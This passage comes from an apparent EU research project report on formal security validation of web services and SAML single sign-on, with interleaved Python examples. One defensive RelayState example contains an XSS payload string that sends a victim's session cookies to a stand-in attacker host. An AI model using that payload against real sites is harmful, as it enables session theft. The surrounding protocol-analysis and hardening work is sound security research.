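    return ("nonce", creator, peer)

def is_op(t, name):
    return isinstance(t, tuple) and t[0] == name

def derivable(t, known):
    """Dolev-Yao composition: t is known, or can be built from known parts."""
    if t in known:
        return True
    if is_op(t, "enc") or is_op(t, "pair"):
        return derivable(t[1], known) and derivable(t[2], known)
    return False

def intruder_rules(known):
    """Decomposition: decrypt with a known private key, split pairs."""
    new = set()
    for t in known:
        if is_op(t, "enc") and is_op(t[1], "pk") and sk(t[1][1]) in known:
            new.add(t[2])
        elif is_op(t, "pair"):
            new.update((t[1], t[2]))
    return new

ALL_NONCES = [nonce(x, y) for x in AGENTS for y in AGENTS]

def protocol_rules(known):
    """Control abstraction: each step fires whenever its input message is
    derivable, regardless of the order in which earlier steps happened.
      1. A -> B : {N_A, A}_pk(B)        2. B -> A : {N_A, N_B}_pk(A)"""
    new = set()
    for A in HONEST:                     # honest initiators talk to anyone
        for B in AGENTS:
            new.add(enc(pk(B), pair(nonce(A, B), A)))
    for B in HONEST:                     # honest responders
        for A in AGENTS:
            for N in ALL_NONCES:         # typed model: first field is a nonce
                if derivable(enc(pk(B), pair(N, A)), known):
                    new.add(enc(pk(A), pair(N, nonce(B, A))))
    return new

RULES = (intruder_rules, protocol_rules)

def initial_knowledge():
    """Agent names, all public keys, the intruder's own key and nonces."""
    return {*AGENTS, sk("i"), *(pk(x) for x in AGENTS),
            *(nonce("i", y) for y in AGENTS)}

def fixpoint(known):
    """Least fixed-point of the rules: over-approximates reachable facts."""
    known = set(known)
    while True:
        new = set().union(*(rule(known) for rule in RULES)) - known
        if not new:
            return frozenset(known)
        known |= new

def is_closed(facts):
    """Certificate check: closed under every rule, hence every reachable
    fact of the model lies in `facts` (the T subset-of T' step)."""
    return all(rule(facts) <= facts for rule in RULES)

def secrecy_violations(facts):
    """Nonces exchanged between two honest agents that the intruder knows."""
    return {t for t in facts
            if is_op(t, "nonce") and t[1] in HONEST and t[2] in HONEST}

if __name__ == "__main__":
    fp = fixpoint(initial_knowledge())
    print("closed:", is_closed(fp), "leaked:", secrecy_violations(fp))
```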

Planned Work for Next Period. An important effort will be devoted to extending the automated reasoning techniques (and validation back-ends) to cover more general LTL properties. In order to be able to reason on ASLan v.2 specifications, this also means defining proper semantics for policy rules (syntactically expressed as Horn clauses) and proper analysis techniques. Orchestration techniques should be enhanced in order to capture more general workflows and to be able to backtrack if some solution is not secure (as detected during the validation phase).

3.1.3 WP4: Validation Platform

Workpackage Objective. The objective of this workpackage is to provide a collection of tools implementing the techniques developed in WP2 and WP3. These tools will be integrated in the AVANTSSAR Platform, an automatic composition and security analysis platform for Web Services and their security policies.

Workpackage Achievements

WP4.1 The TS Orchestrator. The TS Orchestrator (Orchestrator, for short) tries to build an orchestration, i.e. a composition, of the available services in a way that is expected (but not yet guaranteed) to satisfy the input policy.
The Orchestrator takes as input an ASLan v.1.1 file with a specification of the available services and either a specification of the client or a partial specification of the goal. It produces as output an ASLan v.1.1 file with the specification of the available services, a full specification of the goal, and a specification of the client (a putative one, if it was not given as input).
The general idea is to represent the available services and the client service as protocol roles. The intruder with Dolev-Yao capabilities, who has full control over the network, plays the role of an orchestrator: he tries to lead the given transition system from its initial state to a final accepting one. That is why final states are encoded as attack states (from the point of view of the intruder). If he succeeds, that means that he is able to satisfy all the client's requests having only initial knowledge of the goal service and being able to invoke the available services.
In order to check whether the attack state can be reached, we have employed a version of the back-end CL-AtSe: the result is a trace containing the sequence of messages sent and received by the intruder. From the trace we then extract an executable ASLan v.1.1 specification of the goal service.
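The orchestration-as-reachability idea above, as an added Python sketch that is not the project's TS Orchestrator: each available service is a rule turning messages the orchestrator can already produce into new ones, the "attack state" is any knowledge set containing the goal, and the trace found is turned into the ordered behaviour of the goal service. Service names and message labels are constructed.

```python
from collections import deque

# Added example, not the project's TS Orchestrator: service names and message
# labels are constructed. A service is (name, needs, gives): invoking it with
# messages the orchestrator can already produce yields the messages it returns.
SERVICES = [
    ("IdentityProvider", {"credentials"}, {"auth_token"}),
    ("CatalogService", {"auth_token", "item_query"}, {"price_quote"}),
    ("PaymentService", {"auth_token", "price_quote", "card"}, {"payment_receipt"}),
    ("ShippingService", {"payment_receipt", "address"}, {"tracking_id"}),
]

def orchestrate(initial, goal, services=SERVICES, bound=10):
    """Breadth-first search over the orchestrator's knowledge (the role the
    Dolev-Yao intruder plays): a state is the set of messages it can produce,
    and the 'attack state' is any state containing all goal messages.
    Returns the shortest list of service invocations, or None."""
    start = frozenset(initial)
    goal = frozenset(goal)
    queue = deque([(start, [])])
    seen = {start}
    while queue:
        known, trace = queue.popleft()
        if goal <= known:
            return trace
        if len(trace) >= bound:
            continue
        for name, needs, gives in services:
            if needs <= known and not gives <= known:   # applicable and useful
                nxt = known | gives
                if nxt not in seen:
                    seen.add(nxt)
                    queue.append((nxt, trace + [name]))
    return None

def goal_service_spec(trace, services=SERVICES):
    """Extract from the trace the goal service's behaviour: the ordered
    (service, request messages, response messages) steps it must perform."""
    by_name = {name: (needs, gives) for name, needs, gives in services}
    return [(name, sorted(by_name[name][0]), sorted(by_name[name][1]))
            for name in trace]

if __name__ == "__main__":
    client = {"credentials", "item_query", "card", "address"}  # client's knowledge
    trace = orchestrate(client, {"tracking_id"})
    for step in goal_service_spec(trace):
        print(step)
```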

WP4.2 The TS Validator. The TS Validator (Validator, for short) takes as input an orchestration and a security goal formally specified in ASLan v.1.1, and automatically checks whether the orchestration meets the security goal. If this is the case, then the ASLan v.1.1 specification of the validated orchestration is given as output, otherwise a counterexample is sent back to the Orchestrator.
Currently, the functionality of the Validator is supported by the following back-ends, which have been improved and extended to provide support for the ASLan v.1.1 language:

• CL-AtSe (developed and maintained by INRIA),

• OFMC (developed and maintained by IBM), and

• SATMC (developed and maintained by UGDIST)

WP4.3 Platform Integration. We have developed and implemented the first prototype of the AVANTSSAR Validation Platform. A schema of the platform is presented in Figure 1. The platform takes as input a policy stating the functional and security requirements of a goal service and a description of the available services (including a specification of their security-relevant behavior, possibly including the local policies they satisfy) and aims at building an orchestration of the available services that meets the security requirements stated in the policy. The main components of the platform are the TS Orchestrator and the TS Validator described in the previous subworkpackages. The schema of Figure 1 refines that given in the Description of Work as it explicitly includes a connectors layer, i.e. a layer of software modules that carry out the translation from application-level specification languages (e.g. BPEL) into the ASLan v.1.1 language (and vice versa). The ASLan v.1.1 language, which was defined in Deliverable D2.1 ("Requirements for modelling and ASLan v.1" [AVA08b]), is the input and output format of the logical level of the platform. During the second year, we focused on this level of the platform. The aspects related to the connectors layer (i.e. the translation from a high-level language into ASLan v.1.1) will be tackled during the last year.
The AVANTSSAR Platform is implemented as a service-oriented architecture (SOA), where each component service is offered as a Web Service. The platform service is hosted by UGDIST and the orchestrator service is hosted by INRIA. We provide three different instances of the validator service, each of them leveraging a different back-end developed in WP4.2. In particular, OFMC, CL-AtSe, and SATMC are hosted by UNIVR, INRIA, and UGDIST, respectively.

Planned Work for Next Period. The assessment of the AVANTSSAR Platform (within WP5.4) against the validation problems will provide valuable feedback on the usability, effectiveness, and efficiency of the tools we have been developing in WP4. An important effort will be devoted to integrating into the final version of the platform the improvements to the reasoning techniques developed and automated in WP3 and WP4, as a result of the assessment phase. During the second year of the project we mainly focused on the logical level on which the platform operates. The definition of the connectors to the application level will be explicitly addressed in the Industry Migration workpackage WP6, which takes current industrial best practice languages and models into account. The outcome of this work will be integrated in the final version of the platform. As future work, we plan to fix the current limitations of the platform that we have briefly described here and in D4.1. In particular, we will integrate into the Orchestrator the function for generating the TS Wrappers.

3.1.4 WP5: Proof of concept

Workpackage Objective. The role of WP5 is to select and formalize a broad spectrum of industry-relevant problem cases as ASLan v.1.1/ASLan v.2 specifications and then to validate these specifications using the AVANTSSAR Validation Platform. This proof of concept approach will provide a benchmark on which we employ and evaluate the concepts, methodologies, techniques, and tools developed in WP2, WP3, and WP4.

Workpackage Achievements

WP 5.1 - Definition of the relevant problem cases. The work on this subworkpackage has been done mostly in the first year of the project (see Deliverable D5.1 [AVA08c]). A broad collection of industrially relevant SOA trust and security problem cases has been extracted from various application scenarios from strategic application areas including e-business, e-government, and e-health.

WP 5.2 - Formalization of the problem cases & WP 5.3 - Validation of the problem cases & WP 5.4 - Assessment. The work on formalization and validation of the problem cases has continued with the modeling of the selected case studies in ASLan v.1.1 and ASLan v.2 and with their validation via the AVANTSSAR Validation Platform. Details can be found in Deliverables D2.1 [AVA08b], D2.2 [AVA09b] and D4.1 [AVA09a].
Table 1 summarizes the results of the first assessment of the AVANTSSAR Validation Platform. 6 case studies were formalized and 13 problem cases validated as part of the deployment of the first version of the AVANTSSAR validation platform. Details are provided hereafter for the problem cases emerging from the selected application scenarios.

E-Business - Banking Services: Loan Origination Process. A version of the loan origination process (LOP) has been used for the assessment of the first version of the AVANTSSAR validation platform. This case study offers the possibility to focus on workflow security aspects to verify the ability of the platform to spot unexpected behaviors in the interplay between the workflow and the access control policies. This case study has been formalized in ASLan v.1.1 and validated with SATMC.
The LOP describes a bank's evaluation of a customer's request for a loan. The access control policy managing the execution of the process tasks that we consider is based on RBAC enhanced with delegation. In addition to delegation of permission, which is supported in the LOP version presented in Deliverable D4.1 [AVA09a], we now support both delegation of permissions and delegation of execution [GMM05].
The security aspects we have focused on during this year are data confidentiality, separation of duty, and binding of duty.
Data confidentiality amounts to requiring that sensitive data can be accessed only by authorized users. In this context, the validation phase is used to ensure that some given principals cannot access some confidential data. The so-called "forbidden principals" can be users or roles; the latter express the fact that no user having those roles must be able to access the specified confidential data.


Table 1: Application areas and the related families of problem cases.

Legend:
of means no formalization has been done yet.
f v means formalization has been done.
of means orchestration is successful, which implies formalization.
f v means verification has been done, which implies formalization.
fov means both orchestration and verification, which implies formalization.

Columns: Areas, Scenarios, and the families of problem cases Federation, Authorization Policies, Accountability, Trust Management, Workflow Security, Privacy, Application Data Protection, Communication Security.

Rows (area, scenario: cell entries in column order; a row with fewer than eight entries has empty cells whose position is not recoverable from the extracted text):
E-Business, in general: f v | f v | f v | of | f v | f v | f v | of
E-Business, Banking Services: f v | of | of | f v | of | f v | of
E-Business, SW Distribution Services: of | of | of | of
E-Business, Anonymous Shopping: f v | f v | f v
E-Government, in general: of | f v | of | of | fov | of | fov | f v
E-Government, Citizen and Service Portals: of | f v | of | of | fov | of | f v | f v
E-Government, Document Exchange Procedures: f v | of | of | fov | of | of
E-Health, in general (1): f v | of | f v | of | of | of | f v
E-Health, Personal Health Information: of | of | of | of | of | of

(1) This includes the SAML SSO scenario, described below, which can be used rather universally.

Separation of duty (SoD) and binding of duty (BoD) are the most common application-level properties that business processes must comply with in order to mitigate business frauds. SoD (respectively, BoD) requires that some critical tasks are executed by different agents (respectively, by the same agent).
The analysis performed with the AVANTSSAR Validation Platform allows one to identify behaviors of the access control policy in places that are not easy to find without tool support. For instance, delegation may make it possible to circumvent the security measures ensuring data confidentiality. The analysis of the LOP is fully supported by SATMC, which is able to detect violations of the security properties considered. The other tools, OFMC and CL-AtSe, currently support the analysis of a fragment of the specification, and work is going on to support the whole specification.
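An added example in Python (constructed, not the project's LOP model or SATMC) of the kind of check described above, which also illustrates the state-dependent policies of Section 3.1: a three-task workflow with RBAC, delegation of permission, one SoD pair and one forbidden principal is explored by bounded search. With delegation enabled the search finds that alice obtains p_rate by delegation and reads the confidential credit report, and that delegating p_approve lets one agent perform both SoD-constrained tasks; without delegation no violation is reachable. All names are hypothetical.

```python
from collections import deque

# Constructed LOP-style workflow (hypothetical names, not the project's model).
TASKS = ["input_customer_data", "internal_rating", "approve_loan"]
TASK_PERMISSION = {"input_customer_data": "p_input",
                   "internal_rating": "p_rate",
                   "approve_loan": "p_approve"}
TASK_READS = {"internal_rating": {"credit_report"},   # documents a task accesses
              "approve_loan": {"credit_report"}}
ROLE_PERMS = {"preprocessor": {"p_input"}, "postprocessor": {"p_rate"},
              "manager": {"p_approve"}}
USER_ROLES = {"alice": {"preprocessor"}, "bob": {"postprocessor"},
              "carol": {"manager"}}
SOD = [("internal_rating", "approve_loan")]       # must be done by different agents
FORBIDDEN = {"credit_report": {"alice"}}           # forbidden principals per document

def perms_of(user, delegated):
    """Permissions from the user's roles plus those delegated to the user."""
    perms = set()
    for role in USER_ROLES.get(user, ()):
        perms |= ROLE_PERMS[role]
    perms |= {p for (u, p) in delegated if u == user}
    return perms

def violations(executed, properties):
    """Property checks over the history of (task, executor) pairs."""
    found = []
    who = dict(executed)
    if "SoD" in properties:
        for t1, t2 in SOD:
            if t1 in who and t2 in who and who[t1] == who[t2]:
                found.append(("SoD", t1, t2, who[t1]))
    if "confidentiality" in properties:
        for task, user in executed:
            for doc in TASK_READS.get(task, ()):
                if user in FORBIDDEN.get(doc, ()):
                    found.append(("confidentiality", doc, user))
    return found

def analyse(delegation=True, properties=("SoD", "confidentiality"), bound=8):
    """Bounded breadth-first exploration of the workflow under the policy.
    Returns (violation, trace) for the first violating execution, else None."""
    start = (0, (), frozenset())            # (next task, history, delegations)
    queue = deque([(start, [])])
    seen = {start}
    while queue:
        (i, executed, delegated), trace = queue.popleft()
        bad = violations(executed, properties)
        if bad:
            return bad[0], trace
        if len(trace) >= bound:
            continue
        succ = []
        if i < len(TASKS):                   # execute the next task
            task = TASKS[i]
            for user in USER_ROLES:
                if TASK_PERMISSION[task] in perms_of(user, delegated):
                    succ.append(((i + 1, executed + ((task, user),), delegated),
                                 f"{user} executes {task}"))
        if delegation:                       # delegation of permission
            for user in USER_ROLES:
                for perm in perms_of(user, delegated):
                    for other in USER_ROLES:
                        if other != user and (other, perm) not in delegated:
                            succ.append(((i, executed, delegated | {(other, perm)}),
                                         f"{user} delegates {perm} to {other}"))
        for state, step in succ:
            if state not in seen:
                seen.add(state)
                queue.append((state, trace + [step]))
    return None

if __name__ == "__main__":
    print("no delegation:", analyse(delegation=False))
    print("with delegation:", analyse())
    print("SoD only:", analyse(properties=("SoD",)))
```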

E-Business - Anonymous Shopping: Identity Mixer. The Identity Mixer case studies complement the variety of web services that we consider in AVANTSSAR. The system itself is of interest to the project as it offers privacy-friendly technology for a broad scope of areas of services, such as eGovernment, eHealth and the like. For validation, the particular challenges lie in the use of zero-knowledge proofs as building blocks, the privacy goals, and the compositionality of the Identity Mixer system itself.
We have formalized two scenarios in ASLan v.2; details of the formalization and the rationale behind it are given in [37]. The first scenario is an anonymous shopping scenario where a buyer must prove to be over 18 years old by a zero-knowledge proof over his electronic passport. No more information than this is revealed to the electronic store (like the actual birthdate or the user's name). Also, the buyer must store his real name in a verifiable encryption: the buyer can check that the encrypted message is encrypted for a third party and contains the buyer's real name from the passport. This allows us to achieve accountability: if anything goes wrong (e.g., the buyer does not pay) the trusted third party can revoke the privacy of the buyer.
This scenario addresses the problem cases privacy and accountability. For privacy, we limit ourselves to standard secrecy goals here, i.e. the intruder cannot obtain data from a credential he does not own, but we do not consider more advanced goals like unlinkability. For accountability, we verify that (1) after every transaction, the shop has sufficient evidence from which the trusted third party can reveal the real name of the shopper, and (2) this evidence indeed proves the action of the shopper (i.e., it cannot be forged by a malicious shop, for instance).
The second scenario extends the first one by a frequent customer bonus system that involves a party vouching for (properties of) a user in a privacy-friendly way. This scenario addresses the problem case "Federation". This scenario exists in a first formalization, but has not yet been extensively tested with the validation tools. For this reason, we marked only "formalized" for Federation in the table.

E-Government - Citizen and Service Portals: Car Registration. The main focus for the validation work on the Car Registration Process has been the interplay of workflow and access control policies. The workflow orchestration is generated abstracting away from policies, while the validation is performed taking them fully into account. We have formalized this case study in ASLan v.1.1 by refining an initial description specified in ASLan v.2.
The scenario involves a citizen sending a car registration request; this is handled by an employee on behalf of the registration office, and involves storage in a central repository. Access permissions are determined by role-based local policies and several certificates.
The specification of these policies is inspired by the DKAL policy description language. We employ both general rules related to certificates, knowledge and trust, and specific rules describing the local policy of the registration office. They are expressed as Horn clauses and thus evaluated locally in every state of the scenario execution.
For the abstract model with access control embedded directly into the transition rules, all three back-ends find an orchestration scenario that leads to a successful registration. SATMC handles the full model with policies as Horn clauses. For the resulting orchestrated system, we validate several security properties, e.g., that the documents are secret for anyone who cannot read the repository, and that the documents stored in the repository are consistent, with correct signatures.

E-Government - Document Exchange Procedures: Digital Contract Signing

This case study, detailed in Deliverable D4.1, has been modeled in ASLan v.1.1 assuming two signers and one Business Portal. The orchestration problem was to generate a Security Server entity from the specification. The tool was able to obtain a satisfying result in less than 5 seconds of working time. The properties to validate that were proposed by OpenTrust seem to be guaranteed by the synthesized Security Server; however, due to combinatorial explosion, CL-AtSe, the tool used to validate it, did not finish in reasonable time (36 days, and still running). An alternative security property was defined, namely secrecy of the contract to sign. In this setting, CL-AtSe found an attack on this property in a few seconds.


E-Government - Document Exchange Procedures: Public Bidding

The Public Bidding case study has been modeled in ASLan v.2, and then translated to ASLan v.1.1. A particular feature of this case study pertains to various list manipulation operations performed by the participants. The ASLan v.1.1 model had to be simplified (manually) in order to reduce the complexity of the model resulting from these features. The simplified model has been automatically validated with respect to a number of security and functional requirements, and the AVANTSSAR Orchestrator has been used to generate the desired behavior of a bidder entity.

E-Health in general: SAML SSO

The work on SAML SSO has progressed in the second year of the project. The entire SAML web browser SSO profile (see [OAS05b, Section 4.1] for more information) has been formalized in ASLan v.1.1 and validated with SATMC.2

In the scenario supported by the web browser SSO profile, a web user either accesses a resource at a Service Provider (SP-initiated SSO), or accesses an Identity Provider such that the service provider and desired resource are understood or implicit (IdP-initiated SSO). The web user authenticates (or has already authenticated) to the identity provider, which then produces an authentication assertion (possibly with input from the service provider), and the service provider consumes the assertion to establish a security context for the web user.

Both SP-initiated and IdP-initiated SSO can be used in combination with the artifact resolution protocol, which provides a mechanism by which SAML protocol messages can be transported in a SAML binding by reference instead of by value. The SAML web browser SSO profile is a standardized, open, and interoperable solution. In that respect, it offers a significant number of configuration options that allow this solution to be applicable in a multitude of environments. This is why SSO solution providers, e.g., SAP, adopt SAML SSO.

Besides interoperability, which is a must for today's industrial companies running a SOA business model, security is another critical enabler. As a matter of fact, design/development decisions and chosen configuration options do have an impact on security.

We have formally specified and validated industrially relevant scenarios where the SAML SSO services are employed according to the SP-initiated and IdP-initiated SSO protocols, with and without artifact resolution. Around 30 formal specifications capturing these scenarios and the variety of interactions and configuration options have been written and then analyzed.

A strange behavior has been discovered in the SAML Authentication Protocol used in the SP-initiated SSO interaction, where a client might be redirected to another SP, obtaining a resource he/she never asked for. It is not clear whether this strange behavior is a flaw or a desired one, as this depends on the expected security properties of the protocol, which are not fully specified. Interestingly, when combined with lack of sanitization of the RelayState, a URL-encoded parameter often used in SAML to carry the original resource requested by the client, this strange behavior has serious consequences, as a cross-site scripting (XSS) attack can be mounted by a malicious service provider to steal the client's session cookies.

SAML-based SSO for Google Apps was suffering from this exploitation. Google was promptly contacted and fixed the issue by sanitizing the RelayState. Preliminary results indicate that other adopters of the SAML SSO solution may suffer from the very same issue. The work will proceed during the last year of the project to clarify these points.

2 Abstract properties of communication channels are so far expressed as predicates that are currently not supported by the other back-ends.
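The RelayState sink described above, as an added example that is not Google's, SAP's or the AVANTSSAR deliverables' code: the vulnerable reflection of RelayState into the page a service provider returns after consuming the assertion, beside a hardened version that validates the value and escapes it at the point of output. The page template, the helper names and the sample values are assumptions; the 80-byte bound is the limit the SAML 2.0 Bindings specification places on RelayState.

```python
"""RelayState handling at a SAML service provider.

Added example, not code from Google, SAP or the AVANTSSAR deliverables. The
landing-page template and the helper names are assumptions; the 80-byte
bound is the limit the SAML 2.0 Bindings specification places on RelayState.
"""
import html
from urllib.parse import urlsplit


def render_landing_unsafe(relay_state: str) -> str:
    """Vulnerable sink: RelayState is reflected verbatim into the post-login page."""
    return f'<html><body>Signed in. <a href="{relay_state}">Continue</a></body></html>'


def safe_relay_state(relay_state: str, default: str = "/") -> str:
    """Keep RelayState only if it is a same-site relative path; otherwise fall back to default."""
    if not relay_state or len(relay_state.encode()) > 80:
        return default
    parts = urlsplit(relay_state)
    if parts.scheme or parts.netloc:  # absolute or protocol-relative URL: open-redirect territory
        return default
    if not relay_state.startswith("/") or relay_state.startswith("//"):
        return default
    if any(c in relay_state for c in '<>"\'\\'):  # no markup metacharacters in a path we will emit
        return default
    return relay_state


def render_landing_safe(relay_state: str) -> str:
    """Hardened sink: validate RelayState, then HTML-escape it where it is written into the page."""
    target = html.escape(safe_relay_state(relay_state), quote=True)
    return f'<html><body>Signed in. <a href="{target}">Continue</a></body></html>'


# Constructed RelayState values: what a benign SP-initiated flow carries, and what a
# malicious service provider can plant before redirecting the client to the victim SP.
BENIGN = "/orders/42?tab=items"
MALICIOUS = '"><script>new Image().src="https://attacker.example/c?"+document.cookie</script>'

if __name__ == "__main__":
    print(render_landing_unsafe(MALICIOUS))
    print(render_landing_safe(MALICIOUS))
```

In SP-initiated SSO the service provider minted the RelayState itself, so a stricter design than the allowlist above is to send an opaque token and look the original path up server-side when the response comes back; the reflected value is then never attacker-controlled at all.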

3.1.5 WP6: Dissemination and industry migration

Workpackage Objective This workpackage aims at the dissemination and migration of the project results into the scientific community, industry and standardization bodies.

Workpackage achievements

WP 6.1 - Dissemination. Dissemination activities are described, together with the use of foreground, in Section 5.

WP 6.2 - Migration to industrial development environments. Considerable effort has been devoted to this sub-workpackage in the second year of the project.

Industry migration at SAP. Contacts with core business units at SAP, the major industrial player active in this sub-workpackage, have been consolidated and two valuable migration activities have been carried out:


NW-NGSSO: application of AVANTSSAR to formally analyze the SAP NetWeaver SAML Next Generation Single Sign On services. The results obtained by formally analyzing the OASIS SAML 2.0 SSO and the SAML-based SSO offered by Google (see [ACC+08]) received strong interest at SAP NetWeaver Security and Identity Management (SAP NW SIM). An industry migration activity has been carried out in that context, where the AVANTSSAR technology has been employed to perform a formal analysis of the SAML-based SSO solution that SAP NW SIM has designed and developed. The analysis has focused on the most relevant profile of SAML for SAP, the SAML web browser SSO profile (see [OAS05b, Section 4.1] for more information).

The solution designed and developed at SAP SIM for SAP NetWeaver Application Server (SAP NW AS) and SAP NetWeaver Identity Management (SAP NW IdM) employs all the features of the IdP Lite and SP Lite operation modes as described in [OAS05a].3 There, clients can consume services by means of either the SP-initiated or the IdP-initiated SSO profiles, where artifact resolution can be used between SPs and IdPs.

In this industry migration initiative, we have exploited the AVANTSSAR technology to formally analyze SAP-relevant scenarios where the SAML-based NW NG SSO services are employed. In our analysis, we wrote more than 50 formal specifications capturing these scenarios, the variety of configuration options, and the SAP internal design and implementation choices. The analysis conducted with AVANTSSAR shows that the SAP NW NG SSO services are indeed well designed. In this respect, it is worth mentioning that the strange behavior discovered in the SAML Authentication Protocol does not have serious exploitations in the SAML-based NW NG SSO solution, as field sanitizations are properly executed and as cookies are in place to mitigate the risk of undesired redirections from one service provider to another.

All in all, safe and unsafe service compositions and configurations have been identified by our detailed analysis, which can be used by SAP in setting up the NW NGSSO services on customer production systems.

3 SAP NW IdM 7.2 successfully passed the Liberty SAML2 Interoperability Tests. See the press release at http://www.projectliberty.org/news_events/press_releases/entrust_ibm_microsoft_novell_ping_identity_sap_and_siemens_pass_liberty_alliance_saml_2_0_interoperability_testing for more details.


This industry migration initiative is likely to be continued in 2010. A set of interesting future directions has been identified, such as the analysis of the Single Log Out (SLO) profile and the analysis of a composition of SSO, SLO and an STS (Security Token Service). Discussion with SAP SIM on this matter is taking place right now.

NW-BPM: exploitation of AVANTSSAR technology to formally analyze security-critical aspects of business processes within the SAP NetWeaver BPM product solution. More in detail, the SAP team in AVANTSSAR proposes an Eclipse plug-in extension for SAP NetWeaver BPM (NW BPM) through the design and development of a security validator plug-in that enables a business process modeler to easily specify the security goals one wishes to validate. The model-checking verification plug-in is instrumented by a formal analysis to ensure, at design time, that a business process achieves its security/compliance desiderata. The tool proposes a push-button technology, featuring an accessible user interface, to bridge the gap between business process modeling languages and formal method specifications. An automated extraction and compilation of the security-relevant requirements of the process model has been realized. An invocation of the SATMC back-end computes the analysis. As a result, the violations of the security properties (if any) are shown in a graphical way so that the modeler can easily take counter-measures. Preliminary results have been obtained on the Loan Origination Process case study with a few security goals. For the sake of confidentiality, an integration in the existing SAP environment (NetWeaver BPM) will be demonstrated during the second year review and the results will be published in the deliverable D6.2.3 ("Migration to industrial development environment: Lessons learned and best practices") with restricted access. This migration activity is likely to be continued in 2010, with the capture and the analysis of other security-relevant aspects of business processes (e.g., invocation and consumption of remote services) and the assessment of the scalability on more complex industrial processes.

Industry migration at IBM.

AnB. As an industrially suited specification language, IBM has developed AnB, a formal specification language based on Alice-and-Bob notation which is easy to use without a background in formal methods. The novel features as compared to other AnB-style languages are the following:

• A formal semantics that allows for the interpretation of AnB specifications with respect to an algebraic theory (this was developed independently by [24] and [17]; see the description of WP 3.1).

• Support for the notation for secure and pseudonymous channels [25].

• Support for non-interactive zero-knowledge proofs as a (black-box) specification primitive [37].

Contact has been made with other researchers at IBM who are considering the security of services and protocols, and positive feedback has been received: the language and tool support seem indeed useful and are accessible without expertise in formal logic and model checking. Also, their suggestions for further extensions are invaluable for continuing this line of work.

CARL. A new line of work related to Identity Mixer, the case study of IBM, is pursued in collaboration with the EU project PrimeLife: we have devised the new specification language CARL for credential-based access control [34]. The novel aspect of this language is the ability to specify policies in a privacy-friendly way, in particular the minimum amount of information that needs to be revealed (including revealing to third parties). The language is technology neutral, however, so that established technologies (like X.509 certificates) can be used, which do not necessarily ensure the level of privacy that Identity Mixer does (i.e., they reveal more information than required). In relation to AVANTSSAR, we have devised a formal semantics for this language, which is of course a prerequisite for formal verification of CARL-based systems. We have begun designing a mapping from CARL specifications to the Identity Mixer technology [37]; this gives a new form of compositional reasoning, using the Identity Mixer protocols as building blocks of privacy-friendly service-oriented architectures.

Industry migration at OpenTrust. OpenTrust was scheduled to perform work on WP 6.2 in 2009 but temporarily postponed the project work when the employee responsible for the project left the company. OpenTrust hired a new person to manage the project at the close of 2009.


In 2010, OpenTrust will resume its work on WP 6.2 by developing a way to implement advanced business processes, such as those dealing with security policies, and will develop a ready-to-use OpenTrust SPI Security Server client-side process template. OpenTrust will accomplish this, in part, by using and improving third-party tools, such as a Business Process Management plug-in, possibly extended. The tool selection may be based on open source plug-ins, such as JBoss jBPM or Bonita Open Source BPM.

The primary purpose of the secured advanced business process project is to produce an enhanced proof record for document exchange procedures. Eventually, OpenTrust's work will allow users to do the following: script a process using a BPM modeler; translate the process to ASLan v.1.1 so that it can be validated by the AVANTSSAR Validator; use the AVANTSSAR Validator to validate the process; output process validation results that prove the process has been tested and validated; and insert the process validation results into the proof records created by the OpenTrust SPI Security Server, if required.

WP 6.3 - Migration to standardization bodies. Although the work in this sub-workpackage was not supposed to start before month 24, a migration activity towards the OASIS standardization group has already been initiated in the first year of the project (modeling of the SP-initiated SAML SSO profile without artifact resolution) and has progressed over the second year, where the entire SAML web browser SSO profile has been thoroughly studied in preparation for SAML SSO standardization activities at OASIS.4

4 http://saml.xml.org/saml-specifications

Also in this context, a SAML Modelling Environment (SAML ME) has been developed as a Java application at SAP Research. The purpose was to investigate how AVANTSSAR technology could be exploited to mitigate the risk of deploying flawed SAML services such as the SAML-based SSO for Google Apps [ACC+08].

Figure 2: The SAML Modeling Environment.

Though well documented and specified, the OASIS SAML security standard is written in natural language that is sometimes subject to interpretation. When several configuration options, profiles, protocols, bindings, exceptions, and recommendations are discussed in different but interconnected documents, it may become difficult to establish which message fields are mandatory in which profiles and which ones are not. The technical overview document provided by OASIS SAML as a non-official addendum tries to increase clarity in this respect and, in our humble opinion, indeed does so. Still, something went wrong when Google designed and developed its SAML-based SSO services.

Our SAML ME prototype mocks industrial applications built to deploy SAML federated environments (see Figure 2), but features

• a graphical user interface interconnected with a rule engine checking that the chosen configuration options are coherent with the OASIS SAML specification, and

• a security validation process where the configured federated environment is formally analysed through the AVANTSSAR Validation Platform.

For instance, if a modeler creates in the SAML ME an identity provider service and decides to remove the InResponseTo field in the authentication assertion, a message pops up to warn the modeler that InResponseTo is mandatory in the SSO profile (see Figure 3). Notice that the modeller may even have good reasons to remove that field. For instance, a modeller may decide to prevent a Denial of Service pitfall by deselecting, in the authentication request, the ID field that a service provider is supposed to freshly generate and store upon each client request. But what are the consequences? In our SAML ME prototype we can instrument a formal analysis through the AVANTSSAR Validation Platform that establishes whether this decision can be a source of security flaws in the overall federated environment (see Figure 4).

Figure 3: The SAML Modeling Environment: pop-up warning.

Figure 4: The SAML Modeling Environment: validation feature.

All in all, our SAML ME prototype (i) faithfully captures SAML 2.0 to mitigate the risk of ambiguity that may occur due to different interpretations of the specifications and (ii) mitigates, by means of automated formal analysis, the risk of deploying flawed SAML 2.0 services.

A demo of this prototype will be presented at the review meeting. We plan to approach OASIS SAML to openly discuss all these, in our humble opinion, interesting points. This will be the main activity that will take place in the last year of the project.
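The trade-off the SAML ME example raises, between the per-request ID a service provider must generate and store and the storage cost that makes that a Denial of Service pitfall, as an added example that is not code from SAP NetWeaver, from the SAML ME prototype or from the AVANTSSAR deliverables: a bounded, expiring store of issued AuthnRequest IDs, and the InResponseTo check that it makes affordable to keep. Signature verification of the response is assumed to have happened already; the store size, the TTL, the ID format and the response representation are assumptions.

```python
"""AuthnRequest ID issuance and InResponseTo checking at a SAML service provider.

Added example, not code from SAP NetWeaver, the SAML ME prototype or the
AVANTSSAR deliverables. Signature verification of the response is assumed to
have happened already; the store size, TTL and ID format are assumptions.
"""
import secrets
import time
from collections import OrderedDict
from typing import Callable, Dict, Optional


class PendingRequests:
    """Bounded, expiring store of the IDs of AuthnRequests this SP has issued.

    Storing an ID per incoming client request is the Denial of Service pitfall:
    an attacker can make the SP mint IDs until memory runs out. The cap and the
    TTL bound that cost without giving up the InResponseTo check.
    """

    def __init__(self, max_size: int = 10_000, ttl: float = 300.0,
                 clock: Callable[[], float] = time.monotonic) -> None:
        self.max_size, self.ttl, self.clock = max_size, ttl, clock
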